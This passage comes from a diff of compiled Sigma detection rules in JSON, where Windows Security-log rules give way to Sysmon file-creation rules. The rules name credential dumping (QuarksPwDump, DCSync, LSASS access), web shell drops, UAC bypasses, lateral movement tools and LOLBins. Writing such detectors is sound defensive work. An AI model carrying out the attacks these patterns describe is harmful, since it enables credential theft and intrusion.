'%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" 
], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": 
"304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE 
'%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename 
LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry 
where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE 
'\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE 
'%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection 
Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE 
'\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview 
Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" 
+ "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
